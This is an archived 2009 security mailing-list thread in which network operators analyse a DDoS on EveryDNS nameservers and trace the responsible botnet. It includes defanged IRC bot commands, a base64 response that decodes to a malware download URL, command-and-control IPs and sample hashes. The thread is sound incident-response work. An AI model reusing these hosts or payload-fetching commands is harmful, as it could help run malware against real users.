[nsp-sec] DDoS to EveryDNS nameserver IPs

White, Gerard Gerard.White at aliant.ca
Wed Feb 4 20:12:08 EST 2009 

Ladies:

irc.zief.pl on TCP/80

JOIN #.364
PRIVMSG :!get hxxp://horobl.cn/ex/a.php

Name:    horobl.cn
Address:  211.95.79.6  (Note Typo from Below???)

HTTP/1.1 200 OK
Server:  nginx

MD5:  dc9f67ae1d175386625c97fcf22c77ab
11776 Bytes:
http://www.virustotal.com/analisis/34c33485e6a0f326bf75b15cd2ae404c


Which then triggers:
GET hxxp://mega/lgate.php?n=<ID>

With a response of:
HTTP/1.1 200 OK
Server: nginx

Content-Length: 44
MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE=


Which decodes to:
GET hxxp://setdoc.cn/dlk/cae.exe

With a response of:
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2009 08:39:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 03 Feb 2009 17:54:41 GMT
ETag: "154000f-1ae00-5d923a40"
Accept-Ranges: bytes
Content-Length: 110080
Connection: close
Content-Type: application/octet-stream

MD5: deac9c705ed0f4e4c1d0f3c5bb9aa9c1 
http://www.virustotal.com/analisis/2cc2c169bfea6ee56d3298fc853d2355

Uses RSA crypto... drops a file "bogoa.exe"

MD5: 0c524d62abc45d466bd812b091b5d7b0
http://www.virustotal.com/analisis/a9ae781773cba091485e3863c40c1ab4


GW
855 - Bell Aliant


-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Wednesday, February 04, 2009 7:49 PM
To: David Ulevitch; nsp-security at puck.nether.net
Subject: Re: [nsp-sec] DDoS to EveryDNS nameserver IPs

----------- nsp-security Confidential --------

Supposedly these are the likely C&C candidates after a very helpful
individual took a brief glance at an infected machine:

9800    | 211.95.76.6      | UNICOM CHINA UNICOM
23898   | 58.65.232.34     | HOSTFRESH-AS-AP HostFresh Internet

I've fired up the malware on our Sandbox to see if it matches up.  There
are
quie a few varieties of this file and almost 0 AV pick it up.

You can also google for the most recent sample:

SHA1 a5396141cab8b22d9d88b28a814089537dce366a
MD5 01c3346c241652f43aed8e2149881bfe

Lawrence should have a seccheck now.

PID     1252   204.184.73.43:1168   58.65.232.34:80   ESTABLISHED
winlogon.exe   \??\C:\WINDOWS\SYSTEM32\winlogon.exe

PID     1252   204.184.73.43:1175   211.95.79.6:80   ESTABLISHED
winlogon.exe   \??\C:\WINDOWS\SYSTEM32\winlogon.exe

-- steve


On 2/4/09 11:39 AM, "David Ulevitch" <david at opendns.com> wrote:

> ----------- nsp-security Confidential --------
> 
> I'm currently receiving a large DDoS to all my EveryDNS nameserver
IPs:
> 
> ns1.everydns.net has address 208.76.56.56
> ns2.everydns.net has address 78.129.207.168
> ns3.everydns.net has address 71.6.202.220
> ns4.everydns.net has address 208.96.6.134
> 
> The DDoS appears to all be UDP packets of length 1000 bytes.
> 
> Here's what I mean:
> 
> 01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP,
> length 1000
> 01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP,
> length 1000
> 01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP,
> length 1000
> 01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP,
> length 1000
> 01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP,
> length 1000
> 01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP,
> length 1000
> 01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length
> 1000
> 
> Anyone know what this looks like or anything I can do to stop it...
> 
> 3 of the 4 nameservers are offline right now, and I'm working with
> some folks to bring up some more machines now.  Ironically, I'm at the
> ICANN DNS meeting at GATech right now with a bunch of you. :-)
> 
> Thanks,
> David Ulevitch
> 415 971 6916
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
> community. Confidentiality is essential for effective Internet
security
> counter-measures.
> _______________________________________________

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com




_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________

More information about the nsp-security mailing list